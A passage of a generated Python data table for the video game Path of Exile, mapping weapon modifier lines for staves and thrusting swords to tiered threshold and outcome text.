"Adds # to # Fire Damage": [(20, '8% increased Fire Damage'), (40, '(9 - 10)% increased Fire Damage'), (100, '(11 - 12)% increased Fire Damage')],
"Adds # to # Fire Damage if you've Blocked Recently": [(90, '(18 - 20)% increased Fire Damage'), (170, '(21 - 23)% increased Fire Damage'), (500, '(24 - 26)% increased Fire Damage')],
"Adds # to # Lightning Damage": [(35, '8% increased Lightning Damage'), (65, '(9 - 10)% increased Lightning Damage'), (100, '(11 - 12)% increased Lightning Damage')],
"Chill Nearby Enemies when you Block": [(0.0, '(7 - 10)% increased Effect of Chill'), (0.01, '(11 - 15)% increased Effect of Chill')],
"Minions have #% increased maximum Life": [(40, 'Minions have (7 - 9)% increased maximum Life'), (80, 'Minions have (10 - 12)% increased maximum Life'), (150, 'Minions have (13 - 15)% increased maximum Life')],
"Recover #% of your maximum Mana when you Block": [(3, '(5 - 10) Mana gained when you Block'), (5, '(11 - 15) Mana gained when you Block'), (10, 'Recover (4 - 8)% of your maximum Mana when you Block')],
"Reflects # Physical Damage to Melee Attackers": [(300, 'Reflects (10 - 15) Physical Damage to Melee Attackers'), (450, 'Reflects (16 - 40) Physical Damage to Melee Attackers'), (550, 'Reflects (41 - 80) Physical Damage to Melee Attackers'), (1000, 'Reflects (41 - 80) Physical Damage to Melee Attackers\n(19 - 20) to Global Critical Strike Multiplier')],
"Socketed Attacks have +# to Total Mana Cost": [(20, '-1 to Total Mana Cost of Skills'), (40, '-2 to Total Mana Cost of Skills'), (50, '-3 to Total Mana Cost of Skills')],
"Socketed Spells have #% reduced Mana Cost": [(25, '2% reduced Mana Cost of Skills'), (50, '3% reduced Mana Cost of Skills'), (100, '(4 - 5)% reduced Mana Cost of Skills')],
},
"Staff": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (30 - 35)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (30 - 35)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(33 - 36)% increased Fire Damage'), (22, '(37 - 40)% increased Fire Damage'), (50, '(41 - 44)% increased Fire Damage')],
"#% chance to Ignite": [(60, '(9 - 10)% chance to Ignite'), (90, '(11 - 12)% chance to Ignite'), (200, '(13 - 15)% chance to Ignite\n(12 - 15)% increased Ignite Duration on Enemies')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Shock": [(60, '(9 - 10)% chance to Shock'), (90, '(11 - 12)% chance to Shock'), (200, '(13 - 15)% chance to Shock\n(12 - 15)% increased Shock Duration on Enemies')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (27 - 32)% increased Spell Damage'), (500, 'Triggered Spells deal (33 - 38)% increased Spell Damage')],
"#% chance to deal Double Damage": [(18, '4% chance to deal Double Damage'), (50, '5% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(90, '(29 - 35)% increased Attack Damage\n(29 - 35)% increased Spell Damage'), (200, '(36 - 44)% increased Attack Damage\n(36 - 44)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(44, '(3 - 4)% increased Attack Speed\n(11 - 12)% increased Cast Speed'), (100, '(5 - 6)% increased Attack Speed\n(13 - 15)% increased Cast Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(56, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% increased Burning Damage": [(70, '(22 - 27)% increased Burning Damage'), (130, '(28 - 35)% increased Burning Damage'), (500, '(36 - 44)% increased Burning Damage\nIgnites you inflict deal Damage (30 - 35)% faster')],
"#% increased Cast Speed": [(50, '(11 - 12)% increased Cast Speed'), (100, '(13 - 15)% increased Cast Speed'), (200, '(16 - 18)% increased Cast Speed')],
"#% increased Chaos Damage": [(110, '(29 - 32)% increased Chaos Damage'), (220, '(33 - 36)% increased Chaos Damage'), (500, '(37 - 40)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(29 - 32)% increased Cold Damage'), (200, '(33 - 36)% increased Cold Damage'), (300, '(37 - 40)% increased Cold Damage'), (350, '(41 - 44)% increased Cold Damage'), (1000, '(20 - 30)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(16, '2% increased Damage per Endurance Charge'), (50, '(4 - 5)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(16, '2% increased Damage per Frenzy Charge'), (50, '(4 - 5)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(16, '2% increased Damage per Power Charge'), (50, '(4 - 5)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(130, '(21 - 26)% increased Damage'), (260, '(27 - 32)% increased Damage'), (500, '(33 - 38)% increased Damage')],
"#% increased Elemental Damage": [(130, '(21 - 26)% increased Elemental Damage'), (260, '(27 - 32)% increased Elemental Damage'), (500, '(33 - 38)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(29 - 32)% increased Fire Damage'), (200, '(33 - 36)% increased Fire Damage'), (300, '(37 - 40)% increased Fire Damage'), (350, '(41 - 44)% increased Fire Damage'), (1000, '(20 - 30)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 5% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(29 - 32)% increased Lightning Damage'), (200, '(33 - 36)% increased Lightning Damage'), (300, '(37 - 40)% increased Lightning Damage'), (350, '(41 - 44)% increased Lightning Damage'), (1000, '(20 - 30)% increased Conductivity Curse Effect')],
"#% increased Mana Regeneration Rate": [(50, '(16 - 18)% increased Mana Regeneration Rate'), (90, '(19 - 21)% increased Mana Regeneration Rate'), (130, '(22 - 24)% increased Mana Regeneration Rate'), (170, '(25 - 27)% increased Mana Regeneration Rate'), (190, '(28 - 30)% increased Mana Regeneration Rate'), (500, '(28 - 30)% increased Mana Regeneration Rate\n0.6% of Mana Regenerated per second')],
"#% increased Physical Damage": [(200, '(13 - 14)% increased Physical Damage'), (400, '(15 - 16)% increased Physical Damage'), (600, '(17 - 19)% increased Physical Damage'), (725, '(20 - 22)% increased Physical Damage'), (1000, '(23 - 25)% increased Physical Damage')],
"#% increased Spell Damage": [(125, '(22 - 24)% increased Spell Damage'), (250, '(25 - 28)% increased Spell Damage'), (375, '(29 - 35)% increased Spell Damage'), (420, '(45 - 51)% increased Spell Damage'), (1000, 'Spells have a (16 - 18)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(1.17, '(7 - 9)% increased maximum Energy Shield'), (2.33, '(10 - 13)% increased maximum Energy Shield'), (8.33, '(14 - 16)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.4% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '3.0% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '1.0% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '1 to Maximum Endurance Charges'), (100, '1 to Maximum Power Charges')],
"#% reduced Enemy Stun Threshold": [(30, '(5 - 6)% reduced Enemy Stun Threshold'), (35, '(7 - 8)% reduced Enemy Stun Threshold'), (200, '(9 - 10)% reduced Enemy Stun Threshold')],
"#% reduced Soul Cost of Vaal Skills": [(55, 'Vaal Skills deal (36 - 44)% increased Damage'), (110, 'Vaal Skills deal (45 - 51)% increased Damage'), (200, '(60 - 70)% increased Attack Damage if Corrupted\n(60 - 70)% increased Spell Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(45 - 50) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(1100, '(14 - 16)% increased Armour'), (2200, '(17 - 19)% increased Armour'), (5000, '(20 - 22)% increased Armour')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(1100, '(14 - 16)% increased Evasion Rating'), (2200, '(17 - 19)% increased Evasion Rating'), (5000, '(20 - 22)% increased Evasion Rating')],
"+# to Intelligence": [(40, '(6 - 8) to Intelligence'), (70, '(9 - 11) to Intelligence'), (100, '(12 - 14) to Intelligence'), (130, '(15 - 17) to Intelligence'), (160, '(18 - 20) to Intelligence'), (200, 'Adds 1 to (7 - 8) Lightning Damage to Attacks with this Weapon per 10 Intelligence'), (200, '1% increased Spell Damage per 10 Intelligence')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Melee Gems": [(3, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems'), (10, '1 to Level of Socketed Melee Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, 'Adds (2 - 3) to (4 - 5) Fire Damage to Attacks with this Weapon per 10 Strength'), (200, '1% increased Spell Damage per 10 Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Weapon range": [(7, '1 to Weapon range'), (20, '2 to Weapon range')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to maximum Mana": [(70, '(8 - 10) to maximum Mana'), (125, '(11 - 14) to maximum Mana'), (175, '(15 - 19) to maximum Mana'), (230, '(20 - 24) to maximum Mana'), (280, '(25 - 30) to maximum Mana'), (500, '(12 - 14)% increased Attack Damage per 500 Maximum Mana\n(12 - 14)% increased Spell Damage per 500 Maximum Mana')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(60, '(18 - 20) to Global Critical Strike Multiplier'), (120, '(21 - 23) to Global Critical Strike Multiplier'), (150, '(24 - 26) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Damage over Time Multiplier": [(100, '(21 - 23) to Cold Damage over Time Multiplier'), (200, '(24 - 26) to Cold Damage over Time Multiplier'), (500, '(27 - 30) to Cold Damage over Time Multiplier')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Non-Ailment Chaos Damage over Time Multiplier": [(100, '(21 - 23) to Non-Ailment Chaos Damage over Time Multiplier'), (200, '(24 - 26) to Non-Ailment Chaos Damage over Time Multiplier'), (500, '(27 - 30) to Non-Ailment Chaos Damage over Time Multiplier')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(300, 'Adds (7 - 12) to (15 - 26) Chaos Damage'), (450, 'Adds (13 - 21) to (27 - 49) Chaos Damage'), (1000, 'Adds (22 - 43) to (50 - 74) Chaos Damage')],
"Adds # to # Cold Damage": [(120, 'Adds (5 - 8) to (11 - 18) Cold Damage'), (240, 'Adds (9 - 15) to (19 - 28) Cold Damage'), (300, 'Adds (16 - 22) to (29 - 39) Cold Damage'), (360, 'Adds (23 - 30) to (40 - 53) Cold Damage'), (1000, 'Adds (31 - 37) to (44 - 65) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(100, 'Adds (4 - 6) to (8 - 13) Cold Damage to Spells'), (180, 'Adds (7 - 11) to (14 - 20) Cold Damage to Spells'), (250, 'Adds (12 - 16) to (21 - 28) Cold Damage to Spells'), (280, 'Adds (17 - 21) to (28 - 38) Cold Damage to Spells'), (1000, 'Adds (22 - 26) to (31 - 46) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(150, 'Adds (7 - 12) to (13 - 21) Fire Damage'), (300, 'Adds (13 - 19) to (22 - 35) Fire Damage'), (375, 'Adds (20 - 27) to (36 - 48) Fire Damage'), (450, 'Adds (28 - 35) to (49 - 64) Fire Damage'), (1000, 'Adds (36 - 45) to (65 - 80) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(100, 'Adds (5 - 9) to (10 - 15) Fire Damage to Spells'), (200, 'Adds (10 - 14) to (16 - 25) Fire Damage to Spells'), (275, 'Adds (14 - 19) to (26 - 34) Fire Damage to Spells'), (320, 'Adds (20 - 25) to (35 - 45) Fire Damage to Spells'), (1000, 'Adds (26 - 32) to (46 - 56) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(200, 'Adds 1 to (25 - 40) Lightning Damage'), (400, 'Adds (1 - 3) to (41 - 65) Lightning Damage'), (550, 'Adds (2 - 5) to (66 - 82) Lightning Damage'), (650, 'Adds (2 - 7) to (83 - 106) Lightning Damage'), (1000, 'Adds (3 - 9) to (107 - 125) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(150, 'Adds 1 to (18 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 46) Lightning Damage to Spells'), (450, 'Adds (2 - 4) to (47 - 58) Lightning Damage to Spells'), (540, 'Adds (2 - 5) to (59 - 75) Lightning Damage to Spells'), (1000, 'Adds (3 - 7) to (75 - 88) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(50, 'Adds 1 to (2 - 3) Physical Damage'), (100, 'Adds (2 - 3) to (4 - 5) Physical Damage'), (150, 'Adds (4 - 5) to (6 - 7) Physical Damage'), (180, 'Adds (6 - 7) to (8 - 10) Physical Damage'), (500, 'Adds (8 - 9) to (11 - 13) Physical Damage')],
"Always Freezes Enemies on Hit": [(60, 'Always Freezes Enemies on Hit'), (90, 'Always Freezes Enemies on Hit'), (200, 'Always Freezes Enemies on Hit\n(12 - 15)% increased Freeze Duration on Enemies')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(25 - 28)% increased Chaos Damage'), (44, '(29 - 32)% increased Chaos Damage'), (100, '(33 - 36)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(21 - 26)% increased Elemental Damage'), (44, '(27 - 32)% increased Elemental Damage'), (100, '(33 - 38)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(5, 'You and Allies affected by your Aura Skills deal (13 - 16)% increased Damage'), (9, 'You and Allies affected by your Aura Skills deal (17 - 21)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (22 - 25)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(29 - 32)% increased Chaos Damage'), (22, '(33 - 36)% increased Chaos Damage'), (50, '(37 - 40)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(22, '(33 - 36)% increased Cold Damage'), (44, '(37 - 40)% increased Cold Damage'), (100, '(41 - 44)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(22, '(33 - 36)% increased Fire Damage'), (44, '(37 - 40)% increased Fire Damage'), (100, '(41 - 44)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(22, '(33 - 36)% increased Lightning Damage'), (44, '(37 - 40)% increased Lightning Damage'), (100, '(41 - 44)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Cold Damage'), (70, '(37 - 40)% increased Cold Damage'), (100, '(41 - 44)% increased Cold Damage\nGain (7 - 10)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Fire Damage'), (70, '(37 - 40)% increased Fire Damage'), (100, '(41 - 44)% increased Fire Damage\nGain (7 - 10)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Lightning Damage'), (70, '(37 - 40)% increased Lightning Damage'), (100, '(41 - 44)% increased Lightning Damage\nGain (7 - 10)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(10, '(25 - 28)% increased Chaos Damage'), (20, '(29 - 32)% increased Chaos Damage'), (50, '(33 - 36)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(35, '(27 - 32)% increased Global Physical Damage'), (70, '(33 - 38)% increased Global Physical Damage'), (100, '(39 - 44)% increased Global Physical Damage\nGain (7 - 10)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(22, '(29 - 35)% increased Attack Damage'), (44, '(36 - 44)% increased Attack Damage'), (100, '(45 - 51)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(22, '(29 - 35)% increased Spell Damage'), (44, '(36 - 44)% increased Spell Damage'), (100, '(45 - 51)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(25 - 28)% increased Chaos Damage'), (2, '(29 - 32)% increased Chaos Damage'), (10, '(33 - 36)% increased Chaos Damage')],
},
# Data table for the "Thrusting One Hand Sword" item class.
# Each key is a modifier line with '#' as the numeric placeholder; each value
# is a list of (threshold, outcome-text) tuples ordered by ascending
# threshold. NOTE(review): thresholds are presumably roll/weight breakpoints
# selecting the outcome tier — confirm exact semantics against the consumer
# of this table. Generated data: do not hand-edit individual values.
"Thrusting One Hand Sword": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (15 - 20)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (15 - 20)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Poison on Hit": [(50, '(14 - 18)% increased Damage with Poison'), (100, '(19 - 23)% increased Damage with Poison'), (300, '(24 - 28)% increased Damage with Poison\n(25 - 30)% chance to Poison on Hit')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (19 - 22)% increased Spell Damage'), (500, 'Triggered Spells deal (23 - 26)% increased Spell Damage')],
"#% chance to cause Bleeding on Hit": [(50, '(14 - 18)% increased Damage with Bleeding'), (100, '(19 - 23)% increased Damage with Bleeding'), (300, '(24 - 28)% increased Damage with Bleeding\n(15 - 20)% chance to cause Bleeding on Hit')],
"#% chance to deal Double Damage": [(8, '2% chance to deal Double Damage'), (50, '3% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(40, '(23 - 26)% increased Attack Damage\n(23 - 26)% increased Spell Damage'), (100, '(27 - 30)% increased Attack Damage\n(27 - 30)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(22, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(30, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% increased Bleeding Duration": [(20, '(14 - 18)% increased Damage with Bleeding'), (40, '(19 - 23)% increased Damage with Bleeding'), (100, '(24 - 28)% increased Damage with Bleeding\n(8 - 12)% increased Bleeding Duration')],
"#% increased Chaos Damage": [(75, '(18 - 20)% increased Chaos Damage'), (150, '(21 - 23)% increased Chaos Damage'), (500, '(24 - 26)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(18 - 20)% increased Cold Damage'), (160, '(21 - 23)% increased Cold Damage'), (220, '(24 - 26)% increased Cold Damage'), (280, '(27 - 30)% increased Cold Damage'), (1000, '(10 - 15)% increased Frostbite Curse Effect')],
